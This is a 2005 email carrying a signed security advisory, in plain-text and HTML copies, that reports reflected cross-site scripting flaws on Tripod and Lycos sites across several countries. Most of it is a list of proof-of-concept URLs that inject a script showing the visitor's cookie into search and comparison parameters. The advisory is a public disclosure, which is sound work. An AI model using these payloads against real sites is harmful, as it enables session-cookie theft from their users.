This is a multi-part message in MIME format.

------=_NextPart_000_0005_01C53480.E4D6FC80
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Dcrab 's Security Advisory
http://icis.digitalparadox.org/~dcrab
http://www.hackerscenter.com/

Severity:  Medium
Title: Multiple xss vulnerabilities in Tripod.com
Date: March  30,  2005
Site: http://www.tripod.com

Summary:
There are multiple XSS vulnerabilities in the Tripod.com

Proof of Concept Exploit:

http://shopping.lycos.co.uk/query.html?cat=3D0&brd=3D&mrc=3D&qu=3D&query=3D=
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Pops cookie


http://shopping.lycos.co.uk/query.html?cat=3D0&brd=3D&mrc=3D&qu=3D%22%3E%=
3Cscript%3Ealert(document.cookie)%3C/script%3E&query=3D1
Pops cookie


http://shopping.lycos.co.uk/query.html?cat=3D0&brd=3D&mrc=3D%22%3E%3Cscri=
pt%3Ealert(document.cookie)%3C/script%3E&qu=3D&query=3D1
Pops cookie


http://shopping.lycos.co.uk/query.html?cat=3D0&brd=3D%22%3E%3Cscript%3Eal=
ert(document.cookie)%3C/script%3E&mrc=3D&qu=3D&query=3D1
Pops cookie


http://shopping.lycos.co.uk/query.html?cat=3D%22%3E%3Cscript%3Ealert(docu=
ment.cookie)%3C/script%3E&brd=3D&mrc=3D&qu=3D&query=3D1
Pops cookie


http://webhosting.lycos.co.uk/business/compare/?compareId=3D%22%3E%3Cscri=
pt%3Ealert(document.cookie)%3C/script%3E
Pops cookie


http://webhosting.lycos.co.uk/consumer/compare/?compareId=3D"><script>ale=
rt(document.cookie)</script>
Pops cookie


http://www.multimania.lycos.fr/search/?query=3Dphp&collection=3D"><script=
>alert(document.cookie)</script>&action=3D1
Pops cookie


http://www.tripod.jubii.dk/search/?query=3Dphp&collection=3D%22%3E%3Cscri=
pt%3Ealert(document.cookie)%3C/script%3E&action=3D1
Pops cookie


http://www.tripod.lycos.co.uk/search/?query=3Dphp&collection=3D%22%3E%3Cs=
cript%3Ealert(document.cookie)%3C/script%3E&action=3D1
Pops cookie


http://www.tripod.lycos.de/search/?query=3Dphp&collection=3D%22%3E%3Cscri=
pt%3Ealert(document.cookie)%3C/script%3E&action=3D1
Pops cookie


http://www.tripod.lycos.es/search/?query=3Dphp&collection=3D%22%3E%3Cscri=
pt%3Ealert(document.cookie)%3C/script%3E&action=3D1
Pops cookie


http://www.tripod.lycos.it/search/?query=3Dphp&collection=3D%22%3E%3Cscri=
pt%3Ealert(document.cookie)%3C/script%3E&action=3D1
Pops cookie


http://www.tripod.lycos.nl/search/?query=3Dphp&collection=3D%22%3E%3Cscri=
pt%3Ealert(document.cookie)%3C/script%3E&action=3D1
Pops cookie


http://www.tripod.spray.se/search/?query=3Dphp&collection=3D%22%3E%3Cscri=
pt%3Ealert(document.cookie)%3C/script%3E&action=3D1
Pops cookie


Author:
These vulnerabilties have been found and released by Diabolic Crab, =
Email: dcrab[AT|NOSPAM]hackersenter[DOT|NOSPAM]com, please feel free to =
contact me regarding these vulnerabilities. You can find me at, =
http://www.hackerscenter.com or http://icis.digitalparadox.org/~dcrab. =
Lookout for my soon to come out book on Secure coding with php.

-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1 - not licensed for commercial use: www.pgp.com

iQA/AwUBQkk8ISZV5e8av/DUEQLZzwCg/tGlfLNPtQCbYge2oDUyRJK6RR8AoN2C
9FDhk4OgSnAljDh8yIdaJ1cj
=3DqJY/
-----END PGP SIGNATURE-----

------=_NextPart_000_0005_01C53480.E4D6FC80
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=3DContent-Type content=3D"text/html; =
charset=3Diso-8859-1">
<META content=3D"MSHTML 6.00.2900.2604" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV><FONT face=3DArial size=3D2>-----BEGIN PGP SIGNED =
MESSAGE-----<BR>Hash:=20
SHA1</FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>Dcrab 's Security Advisory<BR><A=20
href=3D"http://icis.digitalparadox.org/~dcrab">http://icis.digitalparadox=
.org/~dcrab</A><BR><A=20
href=3D"http://www.hackerscenter.com/">http://www.hackerscenter.com/</A><=
/FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>Severity:&nbsp; Medium<BR>Title: =
Multiple xss=20
vulnerabilities in Tripod.com<BR>Date: March&nbsp; 30,&nbsp; =
2005<BR>Site: <A=20
href=3D"http://www.tripod.com">http://www.tripod.com</A></FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>Summary:<BR>There are multiple XSS =
vulnerabilities=20
in the Tripod.com</FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2>Proof of Concept Exploit:</FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT>&nbsp;</DIV>
<DIV><FONT face=3DArial size=3D2><A=20
href=3D"http://shopping.lycos.co.uk/query.html?cat=3D0&amp;brd=3D&amp;mrc=
=3D&amp;qu=3D&amp;query=3D%22%3E%3Cscript%3Ealert(document.cookie)%3C/scr=
ipt%3E">http://shopping.lycos.co.uk/query.html?cat=3D0&amp;brd=3D&amp;mrc=
=3D&amp;qu=3D&amp;query=3D%22%3E%3Cscript%3Ealert(document.cookie)%3C/scr=
ipt%3E</A><BR>Pops=20
cookie</FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT>&nbsp;</DIV><FONT face=3DArial =
size=3D2>
<DIV><BR><A=20
href=3D"http://shopping.lycos.co.uk/query.html?cat=3D0&amp;brd=3D&amp;mrc=
=3D&amp;qu=3D%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&amp;qu=
ery=3D1">http://shopping.lycos.co.uk/query.html?cat=3D0&amp;brd=3D&amp;mr=
c=3D&amp;qu=3D%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&amp;q=
uery=3D1</A><BR>Pops=20
cookie</DIV>
<DIV>&nbsp;</DIV>
<DIV><BR><A=20
href=3D"http://shopping.lycos.co.uk/query.html?cat=3D0&amp;brd=3D&amp;mrc=
=3D%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&amp;qu=3D&amp;qu=
ery=3D1">http://shopping.lycos.co.uk/query.html?cat=3D0&amp;brd=3D&amp;mr=
c=3D%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&amp;qu=3D&amp;q=
uery=3D1</A><BR>Pops=20
cookie</DIV>
<DIV>&nbsp;</DIV>
<DIV><BR><A=20
href=3D"http://shopping.lycos.co.uk/query.html?cat=3D0&amp;brd=3D%22%3E%3=
Cscript%3Ealert(document.cookie)%3C/script%3E&amp;mrc=3D&amp;qu=3D&amp;qu=
ery=3D1">http://shopping.lycos.co.uk/query.html?cat=3D0&amp;brd=3D%22%3E%=
3Cscript%3Ealert(document.cookie)%3C/script%3E&amp;mrc=3D&amp;qu=3D&amp;q=
uery=3D1</A><BR>Pops=20
cookie</DIV>
<DIV>&nbsp;</DIV>
<DIV><BR><A=20
href=3D"http://shopping.lycos.co.uk/query.html?cat=3D%22%3E%3Cscript%3Eal=
ert(document.cookie)%3C/script%3E&amp;brd=3D&amp;mrc=3D&amp;qu=3D&amp;que=
ry=3D1">http://shopping.lycos.co.uk/query.html?cat=3D%22%3E%3Cscript%3Eal=
ert(document.cookie)%3C/script%3E&amp;brd=3D&amp;mrc=3D&amp;qu=3D&amp;que=
ry=3D1</A><BR>Pops=20
cookie</DIV>
<DIV>&nbsp;</DIV>
<DIV><BR><A=20
href=3D"http://webhosting.lycos.co.uk/business/compare/?compareId=3D%22%3=
E%3Cscript%3Ealert(document.cookie)%3C/script%3E">http://webhosting.lycos=
.co.uk/business/compare/?compareId=3D%22%3E%3Cscript%3Ealert(document.coo=
kie)%3C/script%3E</A><BR>Pops=20
cookie</DIV>
<DIV>&nbsp;</DIV>
<DIV><BR><A=20
href=3D'http://webhosting.lycos.co.uk/consumer/compare/?compareId=3D"><sc=
ript>alert(document.cookie)</script'>http://webhosting.lycos.co.uk/consum=
er/compare/?compareId=3D"&gt;&lt;script&gt;alert(document.cookie)&lt;/scr=
ipt</A>&gt;<BR>Pops=20
cookie</DIV>
<DIV>&nbsp;</DIV>
<DIV><BR><A=20
href=3D'http://www.multimania.lycos.fr/search/?query=3Dphp&amp;collection=
=3D"><script>alert(document.cookie)</script>&amp;action=3D1'>http://www.m=
ultimania.lycos.fr/search/?query=3Dphp&amp;collection=3D"&gt;&lt;script&g=
t;alert(document.cookie)&lt;/script&gt;&amp;action=3D1</A><BR>Pops=20
cookie</DIV>
<DIV>&nbsp;</DIV>
<DIV><BR><A=20
href=3D"http://www.tripod.jubii.dk/search/?query=3Dphp&amp;collection=3D%=
22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&amp;action=3D1">http=
://www.tripod.jubii.dk/search/?query=3Dphp&amp;collection=3D%22%3E%3Cscri=
pt%3Ealert(document.cookie)%3C/script%3E&amp;action=3D1</A><BR>Pops=20
cookie</DIV>
<DIV>&nbsp;</DIV>
<DIV><BR><A=20
href=3D"http://www.tripod.lycos.co.uk/search/?query=3Dphp&amp;collection=3D=
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&amp;action=3D1">htt=
p://www.tripod.lycos.co.uk/search/?query=3Dphp&amp;collection=3D%22%3E%3C=
script%3Ealert(document.cookie)%3C/script%3E&amp;action=3D1</A><BR>Pops=20
cookie</DIV>
<DIV>&nbsp;</DIV>
<DIV><BR><A=20
href=3D"http://www.tripod.lycos.de/search/?query=3Dphp&amp;collection=3D%=
22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&amp;action=3D1">http=
://www.tripod.lycos.de/search/?query=3Dphp&amp;collection=3D%22%3E%3Cscri=
pt%3Ealert(document.cookie)%3C/script%3E&amp;action=3D1</A><BR>Pops=20
cookie</DIV>
<DIV>&nbsp;</DIV>
<DIV><BR><A=20
href=3D"http://www.tripod.lycos.es/search/?query=3Dphp&amp;collection=3D%=
22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&amp;action=3D1">http=
://www.tripod.lycos.es/search/?query=3Dphp&amp;collection=3D%22%3E%3Cscri=
pt%3Ealert(document.cookie)%3C/script%3E&amp;action=3D1</A><BR>Pops=20
cookie</DIV>
<DIV>&nbsp;</DIV>
<DIV><BR><A=20
href=3D"http://www.tripod.lycos.it/search/?query=3Dphp&amp;collection=3D%=
22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&amp;action=3D1">http=
://www.tripod.lycos.it/search/?query=3Dphp&amp;collection=3D%22%3E%3Cscri=
pt%3Ealert(document.cookie)%3C/script%3E&amp;action=3D1</A><BR>Pops=20
cookie</DIV>
<DIV>&nbsp;</DIV>
<DIV><BR><A=20
href=3D"http://www.tripod.lycos.nl/search/?query=3Dphp&amp;collection=3D%=
22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&amp;action=3D1">http=
://www.tripod.lycos.nl/search/?query=3Dphp&amp;collection=3D%22%3E%3Cscri=
pt%3Ealert(document.cookie)%3C/script%3E&amp;action=3D1</A><BR>Pops=20
cookie</DIV>
<DIV>&nbsp;</DIV>
<DIV><BR><A=20
href=3D"http://www.tripod.spray.se/search/?query=3Dphp&amp;collection=3D%=
22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&amp;action=3D1">http=
://www.tripod.spray.se/search/?query=3Dphp&amp;collection=3D%22%3E%3Cscri=
pt%3Ealert(document.cookie)%3C/script%3E&amp;action=3D1</A><BR>Pops=20
cookie</DIV>
<DIV>&nbsp;</DIV>
<DIV><BR>Author:<BR>These vulnerabilties have been found and released by =

Diabolic Crab, Email: dcrab[AT|NOSPAM]hackersenter[DOT|NOSPAM]com, =
please feel=20
free to contact me regarding these vulnerabilities. You can find me at, =
<A=20
href=3D"http://www.hackerscenter.com">http://www.hackerscenter.com</A> =
or <A=20
href=3D"http://icis.digitalparadox.org/~dcrab">http://icis.digitalparadox=
.org/~dcrab</A>.=20
Lookout for my soon to come out book on Secure coding with php.</DIV>
<DIV>&nbsp;</DIV>
<DIV>-----BEGIN PGP SIGNATURE-----<BR>Version: PGP 8.1 - not licensed =
for=20
commercial use: <A href=3D"http://www.pgp.com">www.pgp.com</A></DIV>
<DIV>&nbsp;</DIV>
<DIV>iQA/AwUBQkk8ISZV5e8av/DUEQLZzwCg/tGlfLNPtQCbYge2oDUyRJK6RR8AoN2C<BR>=
9FDhk4OgSnAljDh8yIdaJ1cj<BR>=3DqJY/<BR>-----END=20
PGP SIGNATURE-----<BR></FONT></DIV></BODY></HTML>

------=_NextPart_000_0005_01C53480.E4D6FC80--